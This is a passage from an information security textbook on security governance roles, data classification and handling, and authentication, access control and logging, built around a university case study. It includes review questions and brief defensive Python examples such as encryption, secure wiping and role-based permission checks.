The Chief Information Officer (CIO) heads the IT department, while the Chief Information Security Officer (CISO) heads information security. The CIO's main concern is providing computing service and performance, while the CISO's main concerns are security, privacy and regulation. Since these two often compete for resources and attention, it is preferable that they both report directly to executive management, instead of one reporting to the other. The CISO is not to be confused with the Chief Security Officer, who is often responsible for physical security, including guards, closed-circuit TV, etc. Very large organizations may also have a Chief Risk Officer (CRO), a Chief Privacy Officer (CPO) who protects customer and employee privacy, and/or a Chief Compliance Officer (CCO) who ensures the organization complies with policy and regulation. Alternatively, these positions may be wrapped into the CISO job, which may instead be called the Information Security Manager position.

As mentioned earlier, it is critical that the security function, headed by the CISO, work closely with business management to lead the security planning and testing efforts, in addition to authorizing access to IT applications. However, the CISO must have extended relations with all aspects of the business. The CISO must deal with executive management to help plan security strategy, perform risk management, and define policy. The CISO deals with human resources to establish hiring and training standards, define security roles and responsibilities, and handle employee-related security incidents. The CISO deals with the legal department for laws and regulation, and with purchasing concerning security requirements in


Requests for Proposals (RFPs) and contractual requirements. The CISO works with IT for security monitoring, incident response and equipment inventory. The CISO or security function works with software development to define security requirements, including access control. The CISO or security function deals with quality control for security requirements/review, change control, and security upgrades/testing.

Other groups are important in that security personnel work closely with them. Quality Control tests an end product, to validate that the end product (for example, software) is free from defects and meets user expectations. Quality Assurance ensures that staff follow defined quality processes during the design or building of a product: e.g., following standards in design, coding, testing, or configuration management. Compliance certifies adherence to organizational policies and national regulations. For example, compliance may listen to selected help desk calls to verify that proper authorization occurs when resetting passwords.

The information security department includes other positions, including the Security Architect and Security Administrator [4, 5]. The Security Architect is a security engineer who designs or evaluates security for technology controls (secure network topologies and access control) as well as administrative controls (security policies and standards). They work with compliance, risk management, and audit. Their five main areas of concern include:

• Policy: validate that control systems' rules align with policy and sufficiently restrict access;
• Effectiveness: ensure controls are reliable, automated, and protective without restricting business function;
• Placement: ensure controls safeguard important assets via layers or redundancy;
• Implementation: certify that controls are tested and monitored to ensure continual effectiveness;
• Efficiency: understand the impact to applications and their security when a control fails.

A Security Administrator is a system administrator for the security systems. They allocate logins/passwords (authentication, or identity management) and permissions (access control), according to a data owner's decisions. They also configure security, manage patches, test security controls, collect/report security metrics, monitor controls for security violations, and resolve attacks. Other administrative responsibilities may include preparing a security awareness program and reviewing and evaluating security policy.

To summarize this chapter, IT and security organizations must align to organizational goals. To align security and the organization, it is important to develop an information security steering committee. We have also reviewed the security responsibilities of each security role. Once a security plan is developed, it is important to document and train these roles to perform their security responsibilities properly. We have also introduced the COBIT maturity model, which helps evaluate an organization's security and improve its security posture.


6.5 Questions

1. Vocabulary. Match each meaning with the correct word.

Policy, Guideline, Procedure, Standard, Strategic plan, Quality assurance, Chief security officer, Maturity model, Operational plan, Quality control, Tactical plan, Chief information security officer

(a) A measure of the sophistication of the security process in an organization.
(b) An executive-level business plan focusing on 3–5 years in the future.
(c) A detailed or technical business plan.
(d) A detailed description of a security rule.
(e) A 'how to' guide to accomplish a task.
(f) A function which tests to ensure a business process occurs in the expected way.
(g) A function which tests to ensure the end product is of sufficient quality.
(h) A management plan that addresses the next year.
(i) A high-level management directive.
(j) A suggested implementation of a security rule.
(k) The highest-level business manager in charge of computer security.

2. Planning COBIT. Assume that you are a CISO and you have just brought your organization to Level 2 in COBIT's capability maturity model. Your president has announced that achieving Level 3 is a strategic priority for the next 5 years. You currently have little security documentation, although your staff has been recently trained. Create a Tactical Plan for the next year, and an Operational Plan for the next quarter, to help achieve this goal. (You may review the workbook to determine which aspects might be interesting to implement. Note: there are multiple right answers; the process is important. You may state your assumptions.)

3. Policy, Standard, Procedure, Guideline. Review the chapter on risk. What aspects of this text or workbook chapter might be considered a policy, standard, procedure, and guideline? If you do not find an example of one of these, write an example.

6.5.1 Health First Case Study Problems

For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material.


Case study: Developing a code of ethics. Health First case study: ✓. Other resources: Security Workbook.
Case study: IT governance: planning for strategic, tactical, and operational security. Health First case study: ✓. Other resources: Security Workbook: Appendix B; HIPAA slides or notes.
Case study: Security program development: editing a policy manual for HIPAA. Health First case study: ✓. Other resources: Security Workbook; HIPAA slides or notes (security rule slides).

Note that the case Developing a Code of Ethics can also be used with Chap. 2.

References

1. Baker W (2022) Baker vs. Twitter complaint, case 2:22-cv-06525, document 1, filed 13 September 2022. https://s3.documentcloud.org/documents/22418476/baker-v-twitter-complaint.pdf
2. ISACA (2012) COBIT® 5: a business framework for the governance and management of enterprise IT. ISACA, Arlington Heights, pp 41–45
3. ISACA (2015) CISM® review manual, 15th edn. ISACA, Arlington Heights
4. ISACA (2019) CISA review manual, 27th edn. ISACA, Arlington Heights
5. Harris S (2008) CISSP® all-in-one exam guide. McGraw Hill/Osborne, New York
6. ISACA (2018) Introducing COBIT 2019 overview, November 2018. ISACA, Arlington Heights
7. ISACA (2018) COBIT 2019 Governance-management-objectives-practices-activities, Nov 2018 (xlsx). ISACA, Arlington Heights
8. WiFi (2020) WPA3™ specification version 3.0. Wi-Fi Alliance, Austin

Part III

Tactical Security Planning

Tactical security planning combines technology and business to a higher degree than strategic security planning, which focuses more on business. This section gets into the nuts and bolts of security.

1.1  Important Tactical Concepts

Unfortunately, security is complex and not entirely predictable. Malware lodged in your home laptop can result in the theft of your credit card data and temporary identity theft. However, malware lodged in an industrial control server may damage physical infrastructure, as Stuxnet did to uranium-enrichment centrifuges. This variability in the effect of security occurs because computer networks are a large interconnected system. Network interdependencies are complex and may generate new possibilities, called emergent properties [1]. Consider that when hydrogen and oxygen combine to create water, the combination results in vast new possibilities, unusual considering its two ingredients. Similarly, when iron and carbon are combined, steel emerges, which is far stronger than either of its parts. In the same way, a combination of attacks may cause more damage than any individual attack launched by itself.

The three basic goals of security to consider throughout this section are CIA: Confidentiality assures that information (and equipment) is accessible only to authorized persons; Integrity assures that information is accurate, modified only by authorized persons in a valid way; and Availability assures that information is accessible to authorized persons when they need to access it. These three goals need to be protected across three domains: during storage (e.g., on disk or removable memory), during transmission, and when data is processed.

Restricting all access to protected assets is one way to guarantee security, but this also prevents organizations and people from doing any functions related to these assets. Thus, there is a balance between security and usability. Instead of simply restricting all access, a little extra thought in planning can keep assets safe while enabling proper usage.


Defense in Depth is a method which requires intruders to counter multiple defenses before successfully achieving their goal. Traditional security, such as a castle-fortress, shows excellent security layering. A cascading defense means that as an attacker penetrates one layer, she runs up against other defensive layers. For example, castles were often built on hills or mountains, with trees cut down immediately before the castle walls. Alternatively, there might be a moat. In either case, an attacker cannot get close to the castle without being slowed down and seen. The huge stone castle walls are a second barrier, with armed guard posts to shoot intruders. Third, there is a single entrance, accessible via drawbridge and protected by guards. Fourth, there may be internal spies inside the castle. Thus, to invade a castle in olden times required defeating one defense mechanism after another. The same is sound advice for today's computer networks. Defense in Depth is a concept to consider throughout the book.

A simple defense-in-depth design for a computer network is shown in the figure below. This onion has many layers of defense mechanisms. Although all layers are useful, some layers can be bypassed, just as a modern-day plane could bypass the castle-fortress: the firewall may be bypassed via an internal employee or wireless LAN access; authorization may be bypassed with an SQL injection attack on an unprotected application. An attacker may be able to bypass the authorization, access control and segregation of duties layers with valid account credentials; therefore, security awareness training and blocking frivolous social websites and personal email may be critical defenses to add to this design (Fig. 1).

This section contains a partial security design for Einstein University (EU). Tables are copied from the Security Workbook: text in typed letters is the skeleton text provided for your editing, whereas printed text shows modifications for the EU case study. While this section helps you to design security, it does not implement security.

Fig. 1  Defense in Depth (layers, from outermost to innermost: Firewall; Segregation of Duties; Authorization (login credentials); Access Control (permissions); Information)
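As a minimal sketch of the onion in Fig. 1, the following models the rule that an attacker must defeat every layer, outermost first, before reaching the information; the layer checks themselves are hypothetical stubs.

    # Layer names follow Fig. 1; real checks would be actual controls.
    LAYERS = ["Firewall", "Segregation of Duties",
              "Authorization (login credentials)", "Access Control (permissions)"]

    def attempt_access(defeated):
        """An attacker reaches the information only by defeating every layer."""
        for layer in LAYERS:
            if layer not in defeated:
                print("Blocked at:", layer)
                return False
        print("Information reached: all layers defeated")
        return True

    attempt_access({"Firewall"})   # stops at Segregation of Duties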


At the end of each Workbook design section is a description of the required steps a security administrator/architect will have to take to complete the job. It is recommended that these chapters be performed in order. Information security provides a foundation for Network Security, which provides a foundation for later chapters. Since security is a system, referencing back and fixing earlier chapters when working with later chapters is part of the normal process.

Chapter 7

Designing Information Security

If you store it, they will come. – Justine Young Gottshall, Partner, InfoLaw Group [2]

Previous chapters have emphasized that criminals and spies concentrate on stealing, modifying or destroying financial account information, trade secrets, and internal organization data. This chapter is all about protecting information assets via the three goals of security, CIA: confidentiality, integrity, and availability. Two additional requirements that may apply include legal and privacy liability. We achieve these goals by classifying information assets and then defining how each class of assets should be protected. That, in a nutshell, is what this chapter is all about.

7.1 Important Concepts and Roles

Important concepts in information security concern retaining information and applying CIA to it. The first is minimization, which relates to privacy: personal or private information should be retained only when a true business need exists. Private data is a liability; if you can eliminate information, or retain it for as short a duration as possible, you limit liability. Protected personal information (PPI) is protected by national and/or state laws, and generally includes social security numbers, state identification numbers, driver's license numbers, financial account or credit card information, and medical information (including biometric/DNA data). It is best to eliminate such information, or retain it for as short a period as possible, unless you have a real business or compliance need.

For many organizations, eliminating credit card information is not an option. In this case, Need-to-Know limits the number of people who have access to this information. To maximize the first CIA goal of Confidentiality, persons should have the ability to access data sufficient to perform their primary job role, and no more. Authentication is the function that ensures systems accurately identify a user on the system [8].


It is not only viewing private information that is an issue. The second CIA goal of Integrity ensures that information is correct. To achieve this, only people who should be able to change information are given permissions to do so. Least Privilege ensures that persons have the ability to do tasks sufficient to perform their primary job, and no more. Access control in a computer system enables defining the permissions that employees, contractors and/or volunteers should have; these permissions, or authorizations, should allow them to create, view, modify, and delete only the information necessary to do their jobs. At a higher level, Integrity is best achieved using Segregation of Duties, which ensures that no person assumes more than one of the four roles: Origination, Authorization, Distribution, and Verification. Employees who have worked at a company for a long time tend to accumulate many permissions. The Data Owners or the personnel office should change permissions for employees as their jobs change, to ensure that personnel's permissions are consistent with their current primary job function. A Security Team should design and implement computer applications, processes and systems with segregation of duties in mind.

The third CIA goal, Availability, ensures that authorized people have access to information when they need it; system failures, slowdowns, and hacker attacks all prevent systems from being available. Availability is addressed in part by Business Continuity, Physical Security, and this chapter. It is helpful, but not absolutely necessary, for readers to complete the Business Continuity chapter before continuing.

Business, IT and security all collaborate to protect data, as shown in Fig. 7.1. Important business roles in information security include the Data Owner and Process Owner, who may be the same or different people. The Data Owner or Information Owner is the manager for a business unit who defines which employees get which permissions [4]. As new employees are hired, or jobs change, these permissions should change as per the guidance of the Data Owner. The Process Owner is a manager for a business unit who understands how the business works, and how it should best be protected. They are part of the Information Security Steering Committee, and help to define security documentation and training materials, and enforce policy.

Important technology roles include the Security Architect, who understands security technology and develops security policy, the Data Custodian, and the Security Administrator. The Security Administrator is the systems administrator for security systems. The Data Owner defines the permissions and may enter the permissions directly on a computer. If instead the Security Administrator is the person who physically enters permissions, the Data Owner must provide a written, signed copy of the access control orders. Preferably, the Data Owner would hand the signed document to the Security Administrator, to ensure that critical permissions cannot be faked. The Data Custodian may report to security or IT. They are responsible for protecting the information, including data backup/restore, verifying that backups are valid, and documenting actions related to the data.
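Returning to segregation of duties above, a minimal sketch of an automated check follows; the user names and role assignments are hypothetical.

    # No person may hold more than one of the four roles named above.
    DUTIES = {"origination", "authorization", "distribution", "verification"}

    assignments = {
        "terry": {"origination"},
        "jo": {"authorization", "verification"},  # violates segregation of duties
    }

    for person, roles in assignments.items():
        held = roles & DUTIES
        if len(held) > 1:
            print(f"Violation: {person} holds {sorted(held)}")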


Fig. 7.1  Security staff involved with Data Security (or not)

The steps we take in designing information security are, first, to classify data, so that we can treat some data more securely than other data. Step 2 defines controls for each class of data. Step 3 allocates roles and permissions so that only the appropriate people can access that data.

7.2 Step 1: Classify Data for CIA

Simplicity in security design enables people to easily design, understand, and implement security. Security classifications are one way to achieve such simplicity and minimize the complexity of implementation. Information security uses two classification systems: Sensitivity Classification relates to confidentiality and integrity, whereas Criticality Classification relates to availability [4].

Sensitivity classifications usually include 3–5 classes. Table 7.1 shows an example of how skeleton text in the Security Workbook was modified to describe sensitivity classes for Einstein University. For the university, three classes look useful, but the Proprietary class can be dropped. For the Confidential class, the Description column text is modified to explicitly refer to privacy laws and standards. Well-known U.S. government sensitivity classes include Top Secret, Secret, and Confidential [5].

As defined in the Business Continuity chapter, the Criticality Classification relates to availability.


Table 7.1  Sensitivity classes for Einstein University (workbook exercise)

Proprietary. Description: Protects competitive edge. Material is of critical strategic importance to the company. Dissemination could result in serious financial impact. Information covered: (none; this class is dropped for the university)

Confidential. Description: Information protected by FERPA, PCI DSS and breach notification law. Shall be available on a need-to-know basis only. Dissemination could result in financial liability or reputation loss. Information covered: student info & grades, payment card info, employee info

Privileged. Description: Should be accessible to management or for use with particular parties within the organization. Could cause internal strife or divulge trade secrets if released. Information covered: professor research, student homework, budgets

Public. Description: Disclosure is not welcome, but would not adversely impact the organization. Information covered: teaching lectures

Table 7.2  Information asset inventory: course registration (workbook exercise)

Asset name: Course registration
Value to organization: Records which students are taking which classes
Location: IS Main Center
Sensitivity and criticality classifications: Sensitive, vital
IS system/server name: Regisoft
Data owner: Registrar (Monica Jones)
Designated custodian: IS operations (John Johnson)
Authentication & accountability controls: Login/password authentication (complex passwords, changed annually); logs of staff access to student records
Granted permissions: Department staff, advising: read. Students, registration: read, write. Access is permitted at any time/any terminal

This classification scheme categorizes data by how long the company can survive without automated or computerized access to the data. Classes include:

• Critical: cannot be performed manually; tolerance to interruption is very low.
• Vital: can be performed manually for a very short time.
• Sensitive: can be performed manually for a period of time, but may cost more in staff.
• Nonsensitive: can be performed manually for an extended period of time with little additional cost and minimal recovery effort.

Not all data in the organization needs to be explicitly classified; however, the most important data should be. The next step is to create an Information Asset Inventory, where data can be classified with a criticality and sensitivity class. An example for Course Registration (Table 7.2, from the workbook) defines the important asset, its sensitivity and criticality class, the people who help to secure it, and the people or roles


who have access to it. To start, it is best to define this for your most critical and sensitive data. In this Course Registration example, Granted Permissions briefly lists who has access to this application, without being specific as to what they may or may not access within it. A more detailed definition of permissions is part of Step 3.
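A minimal sketch of recording an Information Asset Inventory entry in code, using the Table 7.2 values, might look as follows; the data structure itself is an illustrative assumption, not a workbook requirement.

    from dataclasses import dataclass, field

    @dataclass
    class InformationAsset:
        name: str
        value: str
        sensitivity: str      # sensitivity class, per Step 1
        criticality: str      # Critical / Vital / Sensitive / Nonsensitive
        data_owner: str
        custodian: str
        permissions: dict = field(default_factory=dict)

    # Values taken from the Course Registration entry in Table 7.2
    course_registration = InformationAsset(
        name="Course registration",
        value="Records which students are taking which classes",
        sensitivity="Sensitive",
        criticality="Vital",
        data_owner="Registrar: Monica Jones",
        custodian="IS operations: John Johnson",
        permissions={"Department staff": "read", "Advising": "read",
                     "Students": "read, write", "Registration": "read, write"},
    )
    print(course_registration.sensitivity, course_registration.criticality)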

7.3 Step 2: Selecting Controls

A classification scheme defines the controls used to protect confidentiality and availability, including how data is marked, distributed, handled, stored, transmitted, archived, and disposed of. Table 7.3 shows suggested handling for various sensitivity classes, amended for a university environment (mainly involved in teaching). It is important that all staff understand the classification process and how data should be handled.

Labeling & Handling: It is possible to use a "Confidential" label as a header or footer on all pages, as well as the title page. The U.S. government uses cover sheets with various colors to reflect sensitivity classes [5].

Disk Storage and Archive: Two issues must be resolved: how long to hold data, and how to store it. Security regulations often specify a retention period. For HIPAA, data shall be retained for 6 years. For Sarbanes-Oxley, audit papers must be retained for 7 years, and records used to assess internal controls over financial data shall never be disposed of [6]. Encryption is the best technique for storing sensitive data. Encrypted disks are considered safe under the U.S. state breach notification laws. Therefore, if you store any protected information (formally known as Personally Identifiable Information, or PII), it should be encrypted, whether on disk or backup. It is possible to encrypt specific files or the whole disk. This is a low-cost control, with the one precaution that if the encryption key is lost, your data cannot be retrieved. Encrypting a disk is not entirely safe: when you power up your computer, the encryption key may be communicated, and any subsequent accesses through the operating system, e.g., by you or a hacker, may expose the data. The data is safely encrypted, however, if a powered-down encrypted laptop or encrypted backup disk/tape is lost or stolen. The issue remains of how to protect decrypted data after power-up. Access control, which adheres to need-to-know and least-privilege concepts, ensures that only authorized people have access. Then, it may be important to prevent even authorized people from writing sensitive data to portable storage. It is possible to install only CD readers, instead of CD reader/writers, and to disable USB drives. These actions would have prevented one WikiLeaks covert data exfiltration in 2010, when a Private overwrote a Lady Gaga CD daily with proprietary U.S. government information [7].

Transmission/Migration: Encryption is important to protect data being transmitted. Encryption can occur on an application basis, or on a link basis affecting all transmissions.
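As a minimal sketch of the encryption-at-rest control described under Disk Storage and Archive, the following uses the third-party Python 'cryptography' package (an assumption; any sound encryption library would do). The file name is hypothetical, and the key must be stored separately and safely, or the data cannot be retrieved.

    from cryptography.fernet import Fernet

    key = Fernet.generate_key()      # losing this key loses the data
    fernet = Fernet(key)

    with open("grades.csv", "rb") as f:          # hypothetical sensitive file
        ciphertext = fernet.encrypt(f.read())
    with open("grades.csv.enc", "wb") as f:
        f.write(ciphertext)

    # Later, with the same key, the data can be recovered
    plaintext = Fernet(key).decrypt(ciphertext)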


Table 7.3  Handling of sensitive information (workbook exercise)

Access. Confidential: need to know, least privilege, multifactor authentication. Privileged: need to know, least privilege, multifactor authentication. Public: need to know.

Paper storage. Confidential: locked cabinet; locked room if unattended. Privileged: locked cabinet; locked room if unattended. Public: locked room if unattended.

Disk storage. Confidential: encrypted; server rooms: camera monitor, multifactor authentication. Privileged: password-protected, encrypted. Public: password-protected.

Labeling & handling. Confidential: label 'confidential', clean desk, low voice, no SSNs, ID required. Privileged: clean desk, low voice. Public: no requirements.

Transmission/migration. Confidential: encrypted with integrity checks. Privileged: encrypted. Public: encrypted.

Email handling. Confidential: no email transmission. Privileged: no requirements. Public: no requirements.

Data warehousing. Confidential: de-identification occurs through summary reports based on course summaries or major summaries. Privileged: not applicable. Public: N.A.

Archive & retention. Confidential: encrypted backups with integrity checks; grades retained online 2 years after graduation, afterwards maintained offline; other information retained only for 6 months after graduation, 1 year after absence. Privileged: encrypted backups with integrity checks. Public: no requirements.

Bring your own data. Confidential: files and documents may be written and read, but not copied to local storage media. Privileged: no copying to local storage media. Public: no requirements.

Disposal & destruction. Confidential: degauss and damage disks; shred paper. Privileged: secure wipe; shred paper. Public: reformat disks.

Cloud storage. Confidential: approved applications only; must meet all requirements specified above; see cloud section for cloud requirements. Privileged: approved applications only; meets above requirements. Public: approved applications only; meets above requirements.

Employee termination. Confidential: purge access rights; ensure no data exfiltration before employee release. Privileged: purge access rights. Public: purge access rights.

Special notes. Confidential: when a student asks, email of grades for that one student is permitted, with email security notice appended.

Email may not be encrypted, but Secure Shell (SSH) and Secure File Transfer Protocol (SFTP) are two applications that enable encrypted remote login and file transfer, respectively. Further discussion of encrypted transmission appears in the next chapter on Network Security.
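A minimal sketch of encrypted file transfer over SFTP follows, using the third-party 'paramiko' library (an assumption; the host name and account are hypothetical, with key-based login configured in advance).

    import paramiko

    client = paramiko.SSHClient()
    client.load_system_host_keys()   # verify the server's host key
    client.connect("backup.example.edu", username="custodian")

    sftp = client.open_sftp()
    sftp.put("grades.csv.enc", "/archive/grades.csv.enc")  # encrypted in transit
    sftp.close()
    client.close()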


Repair, disposal, destruction: These should be carefully handled, since a criminal technique, dumpster diving, is messy but seriously useful for obtaining confidential information. For repairs, disks can be removed before shipment to safeguard disk data. Disks to be discarded should not simply be reformatted; this usually wipes clean only the disk's header index directory, which is similar to clearing out the table of contents of a book but leaving the rest of the book intact! A secure wiping process writes a pattern over the entire disk, which is better, since it is the equivalent of overwriting the entire 'book'; but in very secure situations, magnetic traces of the previous data may still remain. Damaging the disks, by disassembling them and taking a hammer to them, is a low-cost technique that, when added to secure wiping, can be effective for mid-level security data. Alternative means may include incineration. For highly secure information, it is useful to demagnetize a disassembled disk, which is known as degaussing [5].

Peripheral memories, such as DVDs, CDs, flash drives and tapes, should be similarly cleaned or destroyed. In these cases, shredders, grinders, incinerators or disintegrators may all be useful in destroying the media. Demagnetizing works on magnetic diskettes and tapes, but not on optical DVDs, CDs or electronic flash (thumb) drives [14].

It is not possible to reliably delete remote files, e.g., in the cloud. Those files should be encrypted; it is then possible to delete the encryption keys, making the data unreadable. This is called crypto-shredding and is used with remote disks (e.g., cloud storage) [16].

Other non-technical controls, such as physical controls, will be addressed in the Physical Security chapter. That chapter will also be important for addressing availability and its criticality classes.
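As a minimal sketch of secure wiping at the file level (whole-disk wiping requires a dedicated tool, and magnetic traces may still remain, as noted above), the file name and pass count are illustrative assumptions:

    import os

    def secure_wipe(path: str, passes: int = 3) -> None:
        """Overwrite a file's contents with random bytes, then delete it."""
        size = os.path.getsize(path)
        with open(path, "r+b") as f:
            for _ in range(passes):
                f.seek(0)
                f.write(os.urandom(size))   # overwrite the entire 'book'
                f.flush()
                os.fsync(f.fileno())        # push the pattern to the disk
        os.remove(path)

    secure_wipe("grades.csv")   # hypothetical file to be discarded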

7.3.1 Selecting AAA Controls

In this section we consider authentication, authorization, accounting (AAA), and audit. Authentication and authorization enable entry to a computer and its applications, while accounting (or accountability) makes users responsible for their actions. Authentication involves identifying yourself to a computer (e.g., as Terry Dinshah), often via login/password, whereas authorization (or access control) determines which permissions the known user (Terry Dinshah) has [15]. There are four levels of controls: access to the network, the computer, the application, and the various packages or subsystems/servers used by the application, such as a database system. Accountability ensures that users are responsible for their actions, through command or transaction logging. Audit is a control to confirm the implementation of the three As, as well as other controls. Table 7.4 outlines some of these controls.


Table 7.4  AAAA controls

Authentication. Systems: complex passwords, multifactor authentication, biometric systems.
Access controls. Systems: mandatory, role-based, attribute-based, physical and/or discretionary access control; Bell and La Padula model.
Accountability. Systems: logs, transaction audit trails, attack signature detection, trend variance detection.
Audit. Systems: official audits of policies, procedures, staff awareness, security training; management reports monitor accountability.

7.3.2 Authentication: Login or Identification

Authentication is the mechanism of identifying users to enable access to a system. The traditional method of authentication is login and password, where the login identifies who you are, and the password is the secret that only you know. The password mechanism is inadequate because passwords can be guessed (via social engineering, dictionary attacks or brute force), and password files can be copied and repeatedly attacked elsewhere. In the worst case, password guessing is extremely easy when the default password for a device was never changed.

Some precautions can help to protect the login-password method. For every device, passwords shall always be changed from the default, and should never be written down or retained near the terminal or in a desk. It is best to configure operating systems to require complex passwords, periodic password changes, and retention of a password history. Passwords should be long and complex, including 2–3 of: alphabetic, numeric, upper/lower case, and special characters. While the 'recommended' length is at least 8 characters, using a 12- or 16-character password is much safer, providing more protection than complexity alone. Passwords should not be identifiable with the user, for example a family member, pet name, or favorite holiday. Preferably, passwords are changed as often as possible: every 30 days or less for very high security applications, quarterly for high security applications, and annually otherwise. The password history feature ensures that a password cannot be reused during a period, for example 1 year. Password characters should never be displayed when typed, except via asterisks: ***.

The login-password combination is known as single-factor authentication, since it relies on 'something you know'. Identification can include other factors, such as 'something you are or do' (biometrics) and 'something you have' (badges or identification cards) [4, 8]. Multi-factor authentication includes two or more forms of ID, and is considered superior to the simple login/password combination. Thus, a two-factor authentication might include login + password + fingerprint, which is something you know and something you are. A three-factor authentication would include each of something you know, something you have, and something you are/do.
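A minimal sketch of enforcing one such password standard follows, assuming a 12-character minimum and at least three character classes drawn from the guidance above; an organization's own standard may differ.

    import string

    def meets_policy(password: str) -> bool:
        """Check length and count the character classes present."""
        classes = [
            any(c.islower() for c in password),
            any(c.isupper() for c in password),
            any(c.isdigit() for c in password),
            any(c in string.punctuation for c in password),
        ]
        return len(password) >= 12 and sum(classes) >= 3

    print(meets_policy("Summer2024!x"))   # True
    print(meets_policy("password"))       # False: too short, one class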


7.3.2.1 Biometric Systems

Biometrics can be used to recognize 'something you are', such as a fingerprint, face, hand, iris or retina, or 'something you do', such as a signature or voice [8]. Biometric systems are evaluated by user acceptance, accuracy, reliability, and cost/storage requirements. For example, retina matching is highly accurate, but deemed invasive, since a person needs to stand 1–2 inches away from a device for a good read. Palms, hands, and fingerprints are more socially acceptable, but do require physical contact with a reader, which may get slimy. Physical injuries may also affect accessibility. Iris readers do not require physical contact and are socially acceptable, but require large storage and are high cost.

Biometric systems do not provide 100% accuracy. Their accuracy is measured as a percentage using the False Rejection Rate (FRR), the rate of valid users rejected due to non-recognition, and the False Acceptance Rate (FAR), the rate of invalid users accepted due to false recognition. Biometric devices are tuned to minimize both types of errors; the operating point where FRR = FAR is known as the Equal Error Rate (EER). Considerations for different types of biometrics include [16]:

• Accuracy: Palm, hand, iris, and retina have low EER rates.
• Acceptability: Some techniques are deemed invasive, such as retina scanning, where the eye needs to be less than an inch from the reader. Also, physical contact at public readers may be less acceptable.
• Cost, storage: Complexity and storage requirements per user identity vary by biometric type.
• Reliability: Injuries may affect fingerprint recognition; a cold may hamper voice recognition. Replay may be possible (e.g., voice recognition).
• Variability: Biometrics do not change, so if biometric data is stolen, identity is stolen. While voice and signature recognition may change to use different pass phrases, deep fakes may hamper even those technologies.

While biometrics can provide more reliable authentication, it does need to be securely installed and handled. Biometric data must be stored, backed up and transmitted in an encrypted form. There should be a backup authentication method, in case this method fails. Biometric devices must be physically protected: if a door entry device can be screwed off a wall, it provides no security. Finally, there should be adequate documentation and testing to help people use the device and validate its operation.
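A minimal sketch of locating the EER from measured error rates follows; the thresholds and rate values are hypothetical, chosen only to show that the EER sits where FRR and FAR cross.

    # Error rates measured at a sweep of device sensitivity thresholds
    thresholds = [0.1, 0.2, 0.3, 0.4, 0.5]
    frr = [0.01, 0.03, 0.08, 0.15, 0.30]   # valid users rejected
    far = [0.25, 0.12, 0.07, 0.02, 0.01]   # invalid users accepted

    # The EER is approximately where FRR and FAR are closest
    t, r, a = min(zip(thresholds, frr, far), key=lambda p: abs(p[1] - p[2]))
    print(f"EER near threshold {t}: FRR={r}, FAR={a}")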

7.3.3 Authorization: Access Control

Assuming the computer user has successfully authenticated (logged in), access control decides what the user is permitted to do on the computer. Forms of access control include [4, 8]:


Table 7.5  Partial table of roles for university (workbook exercise)

Role name | Role description | Current staff (example roles)
Student | Registers for courses, work-study, and scholarships. Pays bills. Examines personal grades and grade history. Accesses university resources: library, courses or learning management system (LMS) | Includes undergraduate and graduate students, full and part-time
Instructor | Observes registration and creates grades for personally-taught classes in the registration system. Submits files (notes, homework), quizzes, and grades to the LMS; reads student homework and quiz submissions | Includes adjuncts, instructors, and professors
Registrar | Organizes courses and the school calendar. Distributes transcripts upon purchase. Audits graduation | Registrar, asst. registrars
Advisor | Reads student transcripts and grade reports for personally-designated advisees and students in own major. Writes advising notes for the same students | Includes advising department, advising staff outside the advising department, faculty who advise

Table 7.6  Partial role-based access control for university (workbook exercise)

Role name | Information access (e.g., record or form) and permissions (e.g., RWX)
Instructor | Student records: grading form (for own courses) RW; student transcript (current students) R; transfer credit form R. Learning Mgmt System: all parts (RW) except student work submissions (R)
Advising | Student records: student transcript (current students in major area) R; fee payment R; transfer credit form R; advising notes RW, create
Registration | Student records: fee payment RW; transfer credit form RW; specialized advising and course registration forms RW

Role-Based Access Control (RBAC): This technique allocates permissions by role. RBAC has the advantages of simplicity, since all members of a role have identical permissions, and quick implementation, since users can be assigned to a role as a group rather than individually. This type of access control is used in the workbook (and Tables 7.5 and 7.6).

Attribute-Based Access Control (ABAC): Access control for roles may be defined not only per form and report, but also per attribute or field on a form. Thus, some roles will have different read/write permissions for specific fields or forms.

Fig. 7.2  Various examples of access controls

Mandatory Access Control (MAC): MAC is system-determined access control. It is often used within operating systems to control access to files. In Fig. 7.2, Terry is allowed to read File A and File B, can read or write File C, but cannot access File D. In the UNIX-style MAC example in Fig. 7.2, John has read, write, execute (rwx) permissions for File A, while the Mgmt group has read, execute (r-x) permissions. Also, in Table 7.2, the "Granted Permissions" entry defines who has access to the file, without worrying about form-level access. Users are allocated to a MAC group according to any definition.

Discretionary Access Control (DAC): DAC enables a user with permissions to distribute those permissions. In this case, John has permissions to records A–F; he gives June permissions for A–C, while May gets permissions for D–F. June and May can then divvy out permissions to other people, within the permissions they themselves have. Thus, June can give permissions to A, B, or C, but not D. DAC may be used within databases.

Physical Access Control: This technique provides or prevents access to physical locations, via keys, badges, biometric readers, locks, and fences.
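To make RBAC concrete, here is a minimal sketch in Python of a Table 7.6-style permission check. The role names come from the table; the resource names and data layout are hypothetical simplifications.

```python
# Role -> resource -> set of permissions (abridged from Table 7.6).
ROLE_PERMISSIONS = {
    "Instructor":   {"grading_form": {"R", "W"}, "student_transcript": {"R"}},
    "Advising":     {"student_transcript": {"R"}, "advising_notes": {"C", "R", "W"}},
    "Registration": {"fee_payment": {"R", "W"}, "transfer_credit_form": {"R", "W"}},
}

# Users are assigned to roles as a group, never given individual permissions.
USER_ROLES = {"june": "Advising", "terry": "Instructor"}

def is_authorized(user: str, resource: str, permission: str) -> bool:
    role = USER_ROLES.get(user)
    return permission in ROLE_PERMISSIONS.get(role, {}).get(resource, set())

assert is_authorized("june", "advising_notes", "W")    # advisors write notes
assert not is_authorized("june", "fee_payment", "W")   # but cannot edit fees
```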

7.3.4 Accountability: Logs

For secure applications, for example performing financial transactions or writing medical prescriptions, people must be accountable for their actions. The best way to ensure accountability is to record or log transactions using login IDs: who did what, when? Periodic review helps to find accesses with excess authority and to track fraud. The U.S. HIPAA health regulation requires such audit trails. Audit trails should be sensitive to privacy: protected information should be encrypted. A second use of logs is that they also record access violations to the computer, network, or data files, such as login successes and failures.


Intruders in a computer system often want to change the audit trail to hide their tracks. Therefore, logins must be unique and logs must never be changeable. The best log mechanisms use write-once devices or sign logs with digital signatures, and ship them offsite to large storage soon after writing.

Segregation of duties is important with logs. Preferably, security personnel configure system logs, while system administration performs the jobs that create the logs. Even security and systems administrators and managers should have read-only access to logs. After a sufficiently long period, logs can be deleted. PCI DSS requires logs to be retained for 1 year, with logs from the last 3 months quickly accessible [3].

